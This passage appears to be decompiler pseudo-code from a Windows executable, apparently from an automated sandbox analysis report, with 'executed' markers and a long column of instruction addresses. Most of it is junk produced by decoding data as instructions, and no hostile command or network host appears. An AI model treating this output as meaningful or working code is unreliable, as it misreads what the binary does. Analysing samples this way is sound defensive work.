                                  					 *_t239 =  *_t239 + _t239;
                                  					 *_t239 =  *_t239 + _t239;
                                  					asm("invalid");
                                  					asm("invalid");
                                  					asm("invalid");
                                  					 *_t239 =  *_t239 + 1;
                                  					 *_t239 =  *_t239 + _t239;
                                  					_t240 = _t239 + _t378;
                                  					asm("sbb eax, 0x10500040");
                                  					_t363 = _t362 + 1;
                                  					 *_t240 =  *_t240 + _t240;
                                  					 *_t240 =  *_t240 + _t240;
                                  					 *_t240 =  *_t240 + _t378;
                                  					 *_t240 =  *_t240 + _t240;
                                  					 *_t240 =  *_t240 + _t240;
                                  					 *_t240 =  *_t240 + _t240;
                                  					 *_t240 =  *_t240 + _t240;
                                  					 *_t240 =  *_t240 + _t240;
                                  					 *_t240 =  *_t240 + _t240;
                                  					asm("in al, 0x13");
                                  					_t241 = _t240 + 1;
                                  					 *_t363 =  *_t363 + _t241;
                                  					 *0x401cdc00 =  *0x401cdc00 + _t241;
                                  					 *_t241 =  *_t241 + _t241;
                                  					 *_t241 =  *_t241 + _t241;
                                  					_t354 = _t351 + _t351 -  *_t386 + _t351 + _t351 -  *_t386;
                                  					asm("invalid");
                                  					asm("invalid");
                                  					asm("invalid");
                                  					 *_t241 =  *_t241 + 1;
                                  					 *_t241 =  *_t241 + _t241;
                                  					 *_t241 =  *_t241 + _t241;
                                  					_push(ds);
                                  					_t242 = _t241 + 1;
                                  					 *((intOrPtr*)(_t242 + 0x10)) =  *((intOrPtr*)(_t242 + 0x10)) + _t242;
                                  					_t364 = _t363 + 1;
                                  					 *_t242 =  *_t242 + _t242;
                                  					 *_t242 =  *_t242 + _t242;
                                  					 *((intOrPtr*)(_t242 + 0x7e29)) =  *((intOrPtr*)(_t242 + 0x7e29)) + _t242;
                                  					 *_t242 =  *_t242 + _t242;
                                  					 *_t242 =  *_t242 + _t242;
                                  					 *_t242 =  *_t242 + _t242;
                                  					 *_t242 =  *_t242 + _t242;
                                  					 *_t242 =  *_t242 + _t242;
                                  					 *((intOrPtr*)(_t391 + _t378)) =  *((intOrPtr*)(_t391 + _t378)) + _t354;
                                  					_t243 = _t242 + 1;
                                  					 *_t364 =  *_t364 + _t243;
                                  					 *_t386 =  *_t386 + _t243;
                                  					_t244 = _t243 + _t354;
                                  					asm("sbb al, 0x40");
                                  					 *_t244 =  *_t244 + _t244;
                                  					 *_t244 =  *_t244 + _t244;
                                  					asm("invalid");
                                  					asm("invalid");
                                  					asm("invalid");
                                  					 *_t244 =  *_t244 + 1;
                                  					 *_t244 =  *_t244 + _t244;
                                  					 *((intOrPtr*)(_t244 + 0x1e)) =  *((intOrPtr*)(_t244 + 0x1e)) + _t378;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					 *_t268 =  *_t268 + _t268;
                                  					_t270 = (_t268 ^ 0x00000013) + 1;
                                  					 *_t368 =  *_t368 + _t270;
                                  					 *_t270 =  *_t270 + _t270;
                                  					 *_t368 =  *_t368 + _t270;
                                  					 *_t270 =  *_t270 + _t270;
                                  					_t271 = _t270 + _t359;
                                  					asm("sbb al, 0x40");
                                  					 *_t271 =  *_t271 + _t271;
                                  					 *_t271 =  *_t271 + _t271;
                                  					 *_t271 =  *_t271 + _t379;
                                  					_t272 = _t271 + 0xffff0041;
                                  					asm("invalid");
                                  					 *_t272 =  *_t272 + _t272;
                                  					 *_t272 =  *_t272 + _t272;
                                  					 *0x10080040 =  *0x10080040 ^ _t359;
                                  					_t369 = _t368 + 1;
                                  					 *_t272 =  *_t272 + _t272;
                                  					 *_t272 =  *_t272 + _t272;
                                  					_t273 = _t272 + _t272;
                                  					__eflags = _t273;
                                  					if(_t273 < 0) {
                                  						 *_t273 =  *_t273 + _t273;
                                  						 *_t273 =  *_t273 + _t273;
                                  						 *_t273 =  *_t273 + _t273;
                                  						 *_t273 =  *_t273 + _t273;
                                  						 *_t273 =  *_t273 + _t273;
                                  						 *_t273 =  *_t273 + _t273;
                                  						_t326 = _t273 + _t273;
                                  						asm("sbb [eax], eax");
                                  						 *_t326 =  *_t326 + _t326;
                                  						 *_t326 =  *_t326 + _t326;
                                  						_pop(ds);
                                  						_t327 = _t326 + 1;
                                  						 *_t327 =  *_t327 + _t327;
                                  						 *_t327 =  *_t327 + _t327;
                                  						_t328 = _t327 + _t327;
                                  						asm("sbb [eax], eax");
                                  						 *_t328 =  *_t328 + _t328;
                                  						 *_t328 =  *_t328 + _t328;
                                  						asm("enter 0x4019, 0x0");
                                  						 *_t328 =  *_t328 + _t328;
                                  						 *_t328 =  *_t328 + _t328;
                                  						asm("les ebx, [ecx]");
                                  						_t329 = _t328 + 1;
                                  						 *0xc8000000 =  *0xc8000000 + _t329;
                                  						asm("sbb [eax], eax");
                                  						 *_t329 =  *_t329 + _t329;
                                  						_t359 = 1;
                                  						_push(0x90006c00);
                                  						asm("sbb al, [eax]");
                                  						__eflags = _t329 & 0x0000001c;
                                  						_t369 = _t369 + 1;
                                  						 *_t329 =  *_t329 + _t329;
                                  						 *_t329 =  *_t329 + _t329;
                                  						_t113 = 1 + _t387 * 4;
                                  						 *_t113 =  *(1 + _t387 * 4) + _t329;
                                  						__eflags =  *_t113;
                                  						if (__eflags < 0) goto L43;
                                  						if(__eflags != 0) {
                                  							_t330 = _t329 + 1;
                                  							_t385[0x100010] = _t385[0x100010] + _t330;
                                  							asm("adc eax, [eax]");
                                  							 *(_t330 ^ 0x00000000) =  *(_t330 ^ 0x00000000) + (_t330 ^ 0x00000000);
                                  							_pop(ds);
                                  							_t329 =  &(_t392[0]);
                                  							 *_t379 =  *_t379 + _t329;
                                  							 *1 =  *1 + _t329;
                                  							 *_t329 =  *_t329 + _t329;
                                  							 *_t329 =  *_t329 + _t329;
                                  							 *_t329 =  *_t329 + _t329;
                                  							 *_t329 =  *_t329 + _t329;
                                  							_t122 =  &(_t379[0xffffffffed940011]);
                                  							 *_t122 = _t379 + _t379[0xffffffffed940011];
                                  							__eflags =  *_t122;
                                  						}
                                  						asm("sbb al, [eax]");
                                  						_t379 = 0x7c;
                                  						_t126 = _t385 + _t359 + 0x20040;
                                  						 *_t126 =  *(_t385 + _t359 + 0x20040) + _t329;
                                  						__eflags =  *_t126;
                                  						asm("movsb");
                                  						ds = _t329;
                                  						_t273 = _t329 + 1;
                                  						 *0x7c =  *0x7c + _t273;
                                  						__eflags =  *0x7c;
                                  					}
                                  					_t276 = _t273 +  *_t273 +  *((intOrPtr*)(_t273 +  *_t273)) + 1;
                                  					 *_t359 =  *_t359 + _t379;
                                  					 *_t276 =  *_t276 + _t359;
                                  					 *_t276 =  *_t276 + _t276;
                                  					 *((intOrPtr*)(_t385 + _t359 + 0x30040)) =  *((intOrPtr*)(_t385 + _t359 + 0x30040)) + _t379;
                                  					_t277 = _t276 +  *_t276;
                                  					 *_t277 =  *_t277 + _t277;
                                  					 *_t277 =  *_t277 + _t277;
                                  					 *_t277 =  *_t277 + _t277;
                                  					 *_t277 =  *_t277 + _t277;
                                  					asm("clc");
                                  					asm("sbb al, [eax]");
                                  					 *_t277 =  *_t277 + _t277;
                                  					_t278 = _t277 + 1;
                                  					 *_t359 =  *_t359 + _t278;
                                  					 *_t359 =  *_t359 + _t278;
                                  					 *_t278 =  *_t278 + _t278;
                                  					asm("sbb [eax], al");
                                  					__eflags = _t278;
                                  					 *_t278 =  *_t278 + _t278;
                                  					_t280 = _t278 - 0x20 + 1;
                                  					 *((intOrPtr*)(_t280 + _t280)) =  *((intOrPtr*)(_t280 + _t280)) + _t280;
                                  					_t281 = _t280 +  *_t280;
                                  					 *_t281 =  *_t281 + _t281;
                                  					 *_t281 =  *_t281 + _t281;
                                  					 *_t281 =  *_t281 + _t281;
                                  					 *_t281 =  *_t281 + _t281;
                                  					_t393 = _t277;
                                  					asm("sbb eax, [eax]");
                                  					asm("pushad");
                                  					 *_t281 =  *_t281 + _t359;
                                  					_t282 = _t281 + 1;
                                  					 *((intOrPtr*)(_t282 + _t282)) =  *((intOrPtr*)(_t282 + _t282)) + _t282;
                                  					_t284 = _t282 +  *_t282 + 1;
                                  					 *_t385 =  *_t385 + _t359;
                                  					 *_t284 =  *_t284 + _t284;
                                  					 *_t284 =  *_t284 + _t284;
                                  					_t394 = _t393 + 1;
                                  					 *_t284 =  *_t284 & _t284;
                                  					asm("invalid");
                                  					asm("invalid");
                                  					 *_t284 =  *_t284 + _t284;
                                  					 *_t284 =  *_t284 + _t284;
                                  					 *_t284 =  *_t284 + _t284;
                                  					 *_t284 =  *_t284 + _t284;
                                  					asm("aam 0x1b");
                                  					_t285 = _t284 + 1;
                                  					_t138 = _t285 - 0x4a;
                                  					 *_t138 = 0x7c +  *(_t285 - 0x4a);
                                  					__eflags =  *_t138;
                                  					if ( *_t138 < 0) goto L48;
                                  					 *_t285 =  *_t285 & _t285;
                                  					asm("invalid");
                                  					asm("invalid");
                                  					_t286 = _t285 + 1;
                                  					 *_t359 =  *_t359 + 0x7c;
                                  					 *((intOrPtr*)(_t286 + _t286)) =  *((intOrPtr*)(_t286 + _t286)) + _t286;
                                  					 *((intOrPtr*)(_t385 + _t359 + 0x10040)) =  *((intOrPtr*)(_t385 + _t359 + 0x10040)) + 0x7c;
                                  					_t287 = _t286 +  *_t286;
                                  					 *_t287 =  *_t287 + _t287;
                                  					 *_t287 =  *_t287 + _t287;
                                  					 *_t287 =  *_t287 + _t287;
                                  					 *_t287 =  *_t287 + _t287;
                                  					 *((intOrPtr*)(_t287 + 0x40)) =  *((intOrPtr*)(_t287 + 0x40)) + _t359;
                                  					 *_t369 =  *_t369 + _t287;
                                  					 *_t359 =  *_t359 + _t287;
                                  					_t288 = _t287 + 0x7c;
                                  					asm("sbb al, 0x40");
                                  					 *_t288 =  *_t288 + _t288;
                                  					 *_t288 =  *_t288 + _t288;
                                  					asm("sbb [eax], eax");
                                  					_t290 = _t288 + _t369 - 1;
                                  					asm("sbb [eax], eax");
                                  					asm("adc byte [ecx], 0x40");
                                  					 *((intOrPtr*)(_t387 - 0x73ffbfef)) =  *((intOrPtr*)(_t387 - 0x73ffbfef)) + _t290;
                                  					asm("adc [eax], eax");
                                   					 *_t290 =  *_t290 + _t290; /* repeated 40 times */
                                  					asm("lock sbb [eax], eax");
                                  					_t291 = _t290 - 1;
                                  					asm("sbb [eax], eax");
                                  					asm("adc byte [ecx], 0x40");
                                  					 *((intOrPtr*)(_t387 - 0x73ffbfef)) =  *((intOrPtr*)(_t387 - 0x73ffbfef)) + _t291;
                                  					asm("adc [eax], eax");
                                   					 *_t291 =  *_t291 + _t291; /* repeated 40 times */
                                  					asm("sbb [edx], bl");
                                  					_t292 = _t291 + 1;
                                  					 *((intOrPtr*)(_t292 + 0x19)) =  *((intOrPtr*)(_t292 + 0x19)) + _t369;
                                  					_t293 = _t292 + 1;
                                  					 *((intOrPtr*)(_t293 - 0x79ffbfef)) =  *((intOrPtr*)(_t293 - 0x79ffbfef)) + _t293;
                                  					asm("adc [eax], eax");
                                  					 *_t369 = ss;
                                  					_t294 = _t293 + 1;
                                   					 *_t294 =  *_t294 + _t294; /* repeated 50 times */
                                  					 *((intOrPtr*)(_t294 + 0x1a)) =  *((intOrPtr*)(_t294 + 0x1a)) + _t294;
                                  					_t295 = _t294 + 1;
                                  					 *((intOrPtr*)(_t295 + 0x19)) =  *((intOrPtr*)(_t295 + 0x19)) + _t369;
                                  					_t296 = _t295 + 1;
                                  					 *((intOrPtr*)(_t296 - 0x79ffbfef)) =  *((intOrPtr*)(_t296 - 0x79ffbfef)) + _t296;
                                  					asm("adc [eax], eax");
                                  					 *_t369 = ss;
                                  					_t297 = _t296 + 1;
                                   					 *_t297 =  *_t297 + _t297; /* repeated 44 times */
                                  					_t298 = _t297 + _t369;
                                  					asm("sbb al, 0x40");
                                  					 *_t298 =  *_t298 + _t298;
                                  					 *_t298 =  *_t298 + _t298;
                                  					 *_t298 =  *_t298 + _t298;
                                  					 *_t298 =  *_t298 + _t298;
                                  					 *_t298 =  *_t298 + _t298;
                                  					 *_t298 =  *_t298 + _t298;
                                  					 *_t298 =  *_t298 + _t298;
                                  					 *_t298 =  *_t298 + _t298;
                                  					 *_t298 =  *_t298 + _t298;
                                  					 *_t298 =  *_t298 + _t298;
                                  					 *_t298 =  *_t298 + _t298;
                                  					 *_t298 =  *_t298 + _t298;
                                  					 *_t298 =  *_t298 + _t298;
                                  					 *_t298 =  *_t298 + _t298;
                                  					 *_t298 =  *_t298 + _t298;
                                  					 *_t298 =  *_t298 + _t298;
                                  					 *_t298 =  *_t298 + _t298;
                                  					 *_t298 =  *_t298 + _t298;
                                  					_t162 = _t298 + 0x1a;
                                  					 *_t162 =  *(_t298 + 0x1a) + _t369;
                                  					__eflags =  *_t162;
                                  					asm("sbb [eax], eax");
                                  					asm("adc byte [ecx], 0x40");
                                  					 *((intOrPtr*)(_t387 - 0x73ffbfef)) =  *((intOrPtr*)(_t387 - 0x73ffbfef)) + _t298;
                                  					asm("adc [eax], eax");
                                  					 *_t298 =  *_t298 + _t298;
                                  					 *_t298 =  *_t298 + _t298;
                                  					 *_t298 =  *_t298 + _t298;
                                  					 *_t298 =  *_t298 + _t298;
                                  					 *_t298 =  *_t298 + _t298;
                                  					 *_t298 =  *_t298 + _t298;
                                  					 *_t298 =  *_t298 + _t298;
                                  					 *_t298 =  *_t298 + _t298;
                                  					 *_t298 =  *_t298 + _t298;
                                  					 *_t298 =  *_t298 + _t298;
                                  					 *_t298 =  *_t298 + _t298;
                                  					 *_t298 =  *_t298 + _t298;
                                  					 *_t298 =  *_t298 + _t298;
                                  					 *_t298 =  *_t298 + _t298;
                                  					 *_t298 =  *_t298 + _t298;
                                  					 *_t298 =  *_t298 + _t298;
                                  					 *_t298 =  *_t298 + _t298;
                                  					 *_t298 =  *_t298 + _t298;
                                  					 *_t298 =  *_t298 + _t298;
                                  					 *_t298 =  *_t298 + _t298;
                                  					 *_t298 =  *_t298 + _t298;
                                  					 *_t298 =  *_t298 + _t298;
                                  					 *_t298 =  *_t298 + _t298;
                                  					 *_t298 =  *_t298 + _t298;
                                  					 *_t298 =  *_t298 + _t298;
                                  					 *_t298 =  *_t298 + _t298;
                                  					 *_t298 =  *_t298 + _t298;
                                  					 *_t298 =  *_t298 + _t298;
                                  					 *_t298 =  *_t298 + _t298;
                                  					 *_t298 =  *_t298 + _t298;
                                  					 *_t298 =  *_t298 + _t298;
                                  					 *_t298 =  *_t298 + _t298;
                                  					 *_t298 =  *_t298 + _t298;
                                  					 *_t298 =  *_t298 + _t298;
                                  					 *_t298 =  *_t298 + _t298;
                                  					 *_t298 =  *_t298 + _t298;
                                  					 *_t298 =  *_t298 + _t298;
                                  					 *_t298 =  *_t298 + _t298;
                                  					_v28 = _v28 - 0x3f;
                                  					_t395 = _t394 - 0xc;
                                  					 *[fs:0x0] = _t395;
                                  					L004010C0();
                                  					_v48 = _t395;
                                  					_v44 = E00401098;
                                  					_v40 = _v28 & 0x00000001;
                                  					_v28 = _v28 & 0x000000fe;
                                  					 *((intOrPtr*)( *_v28 + 4))(_v28, _t385, _t387, _t359, 0x50,  *[fs:0x0], 0x4010c6, _t389, 0x4800401a, 0x5000401c, _t394);
                                  					__eflags =  *0x411594;
                                  					if( *0x411594 != 0) {
                                  						_v92 = 0x411594;
                                  					} else {
                                  						_push(0x411594);
                                  						_push(0x402090);
                                  						L00401174();
                                  						_v92 = 0x411594;
                                  					}
                                  					_v64 =  *_v92;
                                  					_t313 =  *((intOrPtr*)( *_v64 + 0x14))(_v64,  &_v44);
                                  					asm("fclex");
                                  					_v68 = _t313;
                                  					__eflags = _v68;
                                  					if(_v68 >= 0) {
                                  						_t190 =  &_v96;
                                  						 *_t190 = _v96 & 0x00000000;
                                  						__eflags =  *_t190;
                                  					} else {
                                  						_push(0x14);
                                  						_push(0x402080);
                                  						_push(_v64);
                                  						_push(_v68);
                                  						L0040116E();
                                  						_v96 = _t313;
                                  					}
                                  					_v72 = _v44;
                                  					_t318 =  *((intOrPtr*)( *_v72 + 0x60))(_v72,  &_v40);
                                  					asm("fclex");
                                  					_v76 = _t318;
                                  					__eflags = _v76;
                                  					if(_v76 >= 0) {
                                  						_t203 =  &_v100;
                                  						 *_t203 = _v100 & 0x00000000;
                                  						__eflags =  *_t203;
                                  					} else {
                                  						_push(0x60);
                                  						_push(0x4020a0);
                                  						_push(_v72);
                                  						_push(_v76);
                                  						L0040116E();
                                  						_v100 = _t318;
                                  					}
                                  					_v88 = _v40;
                                  					_v40 = _v40 & 0x00000000;
                                  					L0040117A();
                                  					L00401168();
                                  					_t323 =  *((intOrPtr*)( *_a4 + 0x288))(_a4,  &_v44);
                                  					asm("fclex");
                                  					_v64 = _t323;
                                  					__eflags = _v64;
                                  					if(_v64 >= 0) {
                                  						_t221 =  &_v104;
                                  						 *_t221 = _v104 & 0x00000000;
                                  						__eflags =  *_t221;
                                  					} else {
                                  						_push(0x288);
                                  						_push(0x401f54);
                                  						_push(_a4);
                                  						_push(_v64);
                                  						L0040116E();
                                  						_v104 = _t323;
                                  					}
                                  					_push(0);
                                  					_push(0);
                                  					_push(_v44);
                                  					_t324 =  &_v60;
                                  					_push(_t324);
                                  					L0040115C();
                                  					_push(_t324);
                                  					L00401162();
                                  					_v36 = _t324;
                                  					L00401168();
                                  					L00401156(); // executed
                                  					_t325 = E004107AE(_t359,  &_v60, _t385, _t387); // executed
                                  					_v8 = 0;
                                  					_push(E0041078F);
                                  					L00401150();
                                  					L00401150();
                                  					return _t325;
                                  				} else {
                                  					return _t232;
                                  				}
                                  			}
[Instruction address column, flattened by page extraction: one address per listed line, running from 0x00401198 through 0x0040163b (with 0x00000000 entries in between); the per-line pairing with the decompiled code could not be recovered from the extracted text.]
                                  0x0040163b
                                  0x004015b5
                                  0x004015b5
                                  0x004015b6
                                  0x004015c1
                                  0x004015c1
                                  0x004015c9
                                  0x004015cc
                                  0x004015d3
                                  0x004015d5
                                  0x004015d7
                                  0x004015d9
                                  0x004015db
                                  0x004015de
                                  0x004015df
                                  0x004015e1
                                  0x004015e3
                                  0x004015e5
                                  0x004015e7
                                  0x004015ea
                                  0x004015eb
                                  0x004015ee
                                  0x004015ef
                                  0x004015f1
                                  0x004015f3
                                  0x004015f9
                                  0x004015fb
                                  0x004015fd
                                  0x004015ff
                                  0x00401601
                                  0x00401603
                                  0x00401606
                                  0x00401607
                                  0x00401609
                                  0x0040160b
                                  0x0040160b
                                  0x0040160b
                                  0x00000000
                                  0x0040160b
                                  0x004015c9
                                  0x004015b3
                                  0x00401640
                                  0x00401642
                                  0x00401642
                                  0x00401644
                                  0x00401646
                                  0x00401648
                                  0x0040166b
                                  0x0040166b
                                  0x0040166b
                                  0x0040166b
                                  0x0040166e
                                  0x00401670
                                  0x00401671
                                  0x00401674
                                  0x00401676
                                  0x00401678
                                  0x0040167a
                                  0x0040167c
                                  0x0040167d
                                  0x0040167f
                                  0x0040167f
                                  0x0040164a
                                  0x0040164a
                                  0x0040164b
                                  0x00401651
                                  0x00401653
                                  0x00401656
                                  0x00401658
                                  0x00401659
                                  0x0040165c
                                  0x0040165e
                                  0x00401660
                                  0x00401662
                                  0x00401664
                                  0x00401666
                                  0x00401666
                                  0x00401668
                                  0x0040166a
                                  0x0040166a
                                  0x00000000
                                  0x0040166a
                                  0x00401668
                                  0x00401680
                                  0x00401686
                                  0x00401687
                                  0x0040168d
                                  0x00401690
                                  0x00401692
                                  0x00401694
                                  0x00401696
                                  0x00401698
                                  0x0040169a
                                  0x0040169c
                                  0x0040169e
                                  0x004016a0
                                  0x004016a2
                                  0x004016a4
                                  0x004016a6
                                  0x004016a8
                                  0x004016aa
                                  0x004016ac
                                  0x004016ae
                                  0x004016b0
                                  0x004016b2
                                  0x004016b4
                                  0x004016b6
                                  0x004016b8
                                  0x004016ba
                                  0x004016bc
                                  0x004016be
                                  0x004016c0
                                  0x004016c2
                                  0x004016c4
                                  0x004016c6
                                  0x004016c8
                                  0x004016ca
                                  0x004016cc
                                  0x004016ce
                                  0x004016d0
                                  0x004016d2
                                  0x004016d4
                                  0x004016d6
                                  0x004016d8
                                  0x004016da
                                  0x004016dc
                                  0x004016de
                                  0x004016e0
                                  0x004016e2
                                  0x004016e4
                                  0x004016e6
                                  0x004016e8
                                  0x004016ea
                                  0x004016ec
                                  0x004016ee
                                  0x004016f0
                                  0x004016f2
                                  0x004016f4
                                  0x004016f6
                                  0x004016f8
                                  0x004016fa
                                  0x004016fc
                                  0x004016fe
                                  0x00401700
                                  0x00401702
                                  0x00401704
                                  0x00401706
                                  0x00401708
                                  0x0040170a
                                  0x0040170c
                                  0x0040170d
                                  0x0040170f
                                  0x00401711
                                  0x00401713
                                  0x00401715
                                  0x00401719
                                  0x0040171e
                                  0x0040171f
                                  0x00401725
                                  0x00401728
                                  0x0040172a
                                  0x0040172b
                                  0x0040172d
                                  0x00401730
                                  0x00401732
                                  0x00401734
                                  0x00401736
                                  0x00401738
                                  0x0040173a
                                  0x0040173c
                                  0x0040173e
                                  0x00401740
                                  0x00401742
                                  0x00401744
                                  0x00401746
                                  0x00401748
                                  0x0040174a
                                  0x0040174c
                                  0x0040174e
                                  0x00401750
                                  0x00401752
                                  0x00401754
                                  0x00401756
                                  0x00401758
                                  0x0040175a
                                  0x0040175c
                                  0x0040175e
                                  0x00401760
                                  0x00401762
                                  0x00401764
                                  0x00401766
                                  0x00401768
                                  0x0040176a
                                  0x0040176c
                                  0x0040176e
                                  0x00401770
                                  0x00401772
                                  0x00401774
                                  0x00401776
                                  0x00401778
                                  0x0040177a
                                  0x0040177c
                                  0x0040177e
                                  0x00401780
                                  0x00401782
                                  0x00401784
                                  0x00401786
                                  0x00401788
                                  0x0040178a
                                  0x0040178c
                                  0x0040178e
                                  0x00401790
                                  0x00401792
                                  0x00401794
                                  0x00401796
                                  0x00401798
                                  0x0040179a
                                  0x0040179c
                                  0x0040179e
                                  0x004017a0
                                  0x004017a2
                                  0x004017a4
                                  0x004017a6
                                  0x004017a8
                                  0x004017aa
                                  0x004017ac
                                  0x004017ae
                                  0x004017b0
                                  0x004017b2
                                  0x004017b4
                                  0x004017b6
                                  0x004017b8
                                  0x004017ba
                                  0x004017bc
                                  0x004017be
                                  0x004017c0
                                  0x004017c2
                                  0x004017c4
                                  0x004017c6
                                  0x004017c8
                                  0x004017ca
                                  0x004017cc
                                  0x004017ce
                                  0x004017d0
                                  0x004017d2
                                  0x004017d4
                                  0x004017d6
                                  0x004017d8
                                  0x004017da
                                  0x004017dc
                                  0x004017de
                                  0x004017e0
                                  0x004017e2
                                  0x004017e4
                                  0x004017e6
                                  0x004017e8
                                  0x004017ea
                                  0x004017ec
                                  0x004017ee
                                  0x004017f0
                                  0x004017f2
                                  0x004017f4
                                  0x004017f6
                                  0x004017f8
                                  0x004017fa
                                  0x004017fc
                                  0x004017fe
                                  0x00401800
                                  0x00401802
                                  0x00401804
                                  0x00401806
                                  0x00401808
                                  0x0040180a
                                  0x0040180c
                                  0x0040180e
                                  0x00401810
                                  0x00401812
                                  0x00401814
                                  0x00401816
                                  0x00401818
                                  0x0040181a
                                  0x0040181c
                                  0x0040181e
                                  0x00401820
                                  0x00401822
                                  0x00401824
                                  0x00401826
                                  0x00401828
                                  0x0040182a
                                  0x0040182c
                                  0x0040182e
                                  0x00401830
                                  0x00401832
                                  0x00401834
                                  0x00401836
                                  0x00401838
                                  0x0040183a
                                  0x0040183c
                                  0x0040183e
                                  0x00401840
                                  0x00401842
                                  0x00401844
                                  0x00401846
                                  0x00401848
                                  0x0040184a
                                  0x0040184c
                                  0x0040184e
                                  0x00401850
                                  0x00401852
                                  0x00401854
                                  0x00401856
                                  0x00401858
                                  0x0040185a
                                  0x0040185c
                                  0x0040185e
                                  0x00401860
                                  0x00401862
                                  0x00401864
                                  0x00401866
                                  0x00401868
                                  0x0040186a
                                  0x0040186c
                                  0x0040186e
                                  0x00401870
                                  0x00401872
                                  0x00401874
                                  0x00401876
                                  0x00401878
                                  0x0040187a
                                  0x0040187c
                                  0x0040187e
                                  0x00401880
                                  0x00401882
                                  0x00401884
                                  0x00401886
                                  0x00401888
                                  0x0040188a
                                  0x0040188c
                                  0x0040188e
                                  0x00401890
                                  0x00401892
                                  0x00401894
                                  0x00401896
                                  0x00401898
                                  0x0040189a
                                  0x0040189c
                                  0x0040189e
                                  0x004018a0
                                  0x004018a2
                                  0x004018a4
                                  0x004018a6
                                  0x004018a8
                                  0x004018aa
                                  0x004018ac
                                  0x004018ae
                                  0x004018b0
                                  0x004018b2
                                  0x004018b4
                                  0x004018b6
                                  0x004018b8
                                  0x004018ba
                                  0x004018bc
                                  0x004018be
                                  0x004018c0
                                  0x004018c2
                                  0x004018c4
                                  0x004018c6
                                  0x004018c8
                                  0x004018ca
                                  0x004018cc
                                  0x004018ce
                                  0x004018d0
                                  0x004018d2
                                  0x004018d4
                                  0x004018d6
                                  0x004018d8
                                  0x004018da
                                  0x004018dc
                                  0x004018de
                                  0x004018e0
                                  0x004018e2
                                  0x004018e4
                                  0x004018e6
                                  0x004018e8
                                  0x004018ea
                                  0x004018ec
                                  0x004018ee
                                  0x004018f0
                                  0x004018f2
                                  0x004018f4
                                  0x004018f6
                                  0x004018f8
                                  0x004018fa
                                  0x004018fc
                                  0x004018fe
                                  0x00401900
                                  0x00401902
                                  0x00401904
                                  0x00401906
                                  0x00401908
                                  0x0040190a
                                  0x0040190c
                                  0x0040190e
                                  0x00401910
                                  0x00401912
                                  0x00401914
                                  0x00401916
                                  0x00401918
                                  0x0040191a
                                  0x0040191c
                                  0x0040191e
                                  0x00401920
                                  0x00401922
                                  0x00401924
                                  0x00401926
                                  0x00401928
                                  0x0040192a
                                  0x0040192c
